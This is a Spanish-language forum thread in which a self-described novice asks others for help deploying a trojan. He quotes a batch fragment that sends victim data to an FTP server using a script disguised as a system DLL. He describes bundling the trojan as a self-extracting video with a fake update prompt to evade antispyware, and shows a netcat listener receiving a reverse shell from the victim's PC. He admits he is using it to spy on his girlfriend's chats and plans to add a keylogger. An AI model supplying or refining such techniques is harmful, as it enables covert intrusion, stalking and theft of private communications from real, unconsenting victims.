mira... si el problema no es saber la ip... por que la saco del comando netstat -na cuando estoy en msn o mandando archivos a la vistima... si el problema es que los bat te delatan... me entiendes...
dime una cosa... una vez que tengo el servidor instalado en el pc de la victima... el dll... y todo lo que instala... yo sabiendo la ip (que es dinamica)... me conecto con esa ip... y el puerto 1719 deberia funcionar...
¿que pongo aqui?

 echo configuracion del sistema de la victima (en esta no entiendo)
echo usuario > ( en esta me imagino que el nick de usuario que hice)
echo contraseña >(¿es la contraseña del nick?)
ftp -s:C:\WINDOWS\system32\Win32el.dll servidor ftp (y aqui no cacho... en vez de poner servidor pongo algun numero, una direccion o que..)
exit

y con respecto a otra cosa... solo por cultura informatica... si tenemos acceso a este tipo de derechos... podemos poner que se conecte la webcam o eso es otra cosa... lei por ahi que a alguien lo detenieron por habilitar una webcam de otra persona... creo que fue en argentina... pero no me imagino como se pueda hacer eso...


saludos...!!!!

Hola Octalh... gracias por responder... bueno... tratare de probar ese bat... a ver como funciona... pero un consejo al momento de que cualquier antivirus, vacuna, o antispyware avise podriamos transformar el archivo exe. (troyano) en un archivo zip autoejecutable... poniendole sus mismos iconos, etc... yo le puse en selecionar comandos: "cualquier tipo de archivo", asi le mande un video chistoso a un amigo... y lo que ve el es que se descomprime y luego ve el video, mientras que se ejecutan todos los bat sin que se de cuenta... con algun mensaje para despirtar, porsupuesto, Windows Media Player: Tu archivo ha sido descargado con exito.

pero para una persona que proteja su computador a diario... el archivo que tranformemos podriamos disfrasarlo como una actualizacion del mismo Windows Media Player... asi al momento de que aviso de que aviax.exe esta intentando connectarse a internet o el mismo r_server... el mensaje dira que aviax o cualquier nombre es la actualizacion del mismo y que no se puede ver el video sin esta actualizacion... luego que acepte... le mandamos otro mensaje que diga que se actualizo... es solo una idea al momento de que funcionen todas las defensas... por que no dira que es un virus... sino que hay programas que intentan conectarse a la net...
pero igual me gustaria saber cual podria ser el bat que se pase por alto el famoso "AnitiSpyWare" pues es él quien me delató. y otra cosa muy interesante... busqué... con el programa para cambiar los iconos, ResHack... ejecute el winzip: c:\archivo de programa\winzip32 ... y encontre un icono transparente... muy util al momento de camuflar el servidor... asi... si se llegara a ver en la barra de tareas... solo se veria un espacio ... ok...

Y por ultimo te recuerdo octalh que solo soy un novato... y quede plop al momento de intentar ingresar mis datos en el ultimo bat que mandaste... si eres tan amable de dar un ejemplo de como podria quedar con datos... aprueba de jiles que preguntan tonteras... ya?

 



saludos y gracias...!!!
 

Gracias... me di cuenta pero yo pense... que de donde saco el icono para camuflarlo tenia que ponerle asi... al final entre al pc de la victima... que me fue muy util... (estoy espiando a mi polola... sus conversaciones de chat me han dicho todo....) pero ahora quiero instalarle un "key recorder" pero si se lo tiro al inicio ella lo vera... en eso estoy... TENGO UN GRAVE PROBLEMA... CUANDO PARTE SU conexión Y ESPERO LA SHELL REVERSE: -L -P 1717 -VV... NO PASA NADA... TUBE QUE DECIRLE QUE EJECUTARA EL TROYANO DE NUEVO PARA ENTRAR... ¿SI LE CAMBIO ESA NOTA ERRADA AL BAT... FUNCIONARA CADA VEZ QUE PARA EL PCSIN TENER QUE EJECUTAR EL TROYANO? 


GRACIAS POR RESPONDER... THANKS MASTERS OF COMPUTERS

HOLA COMPADRE... YO AUN SOY UN NOVATO PERO APRENDO MUY RAPIDO... SEGUI TUS INDICACIONES PASO A PASO... LLEGUE AL PUNTO DE ENTRAR EN LA SHELL... TENGO CASI TODO PERO NO PUEDO ENTRAR... ME CONECTO A LA IP QUE ME DEVUELVE (QUE EN TODO CASO POR OTRO LADO ME LA PUEDO CONSEGUIR... ES LA MISMA...) VEO SUS PROGRAMAS CARPETAS, ARCHIVOS.... TIENE EL R_SERVER ANDANDO PERO NO LOGRO CONECTARME ???

SUPONGO... MMM TENGO ESTOS PUERTOS EN UN ENREDO:
1717
1719 Y EL PUERTO QUE SALE CON LA IP ERA 1277  ???

ME SALE ASI:

C:\>nc.exe
Cmd Line: -L -p 1717 -vv
listening on [any] 1717...
conecct to [ip.atacante] from pc-xxx-xx-xxx-xxx.cm.vtr.net [ip.victima] 1277
Microft Windows todo el resto...
C:\Document and Settings\"Nombre de la cuenta"\Mis documentos\Mis archivos recibidos

LE PONGO LA IP DE LA VICTIMA Y NO PASA NA... PROBE CON TODOS LOS PUERTOS QUE MENCIONE Y NO SE QUE HACER...
PODRIAS SER TAN GENIAL DE EXPLICARME LOS PASOS QUE SON OBVIOS PARA TI... PERO INEXPLICABLES PARA MI?  ???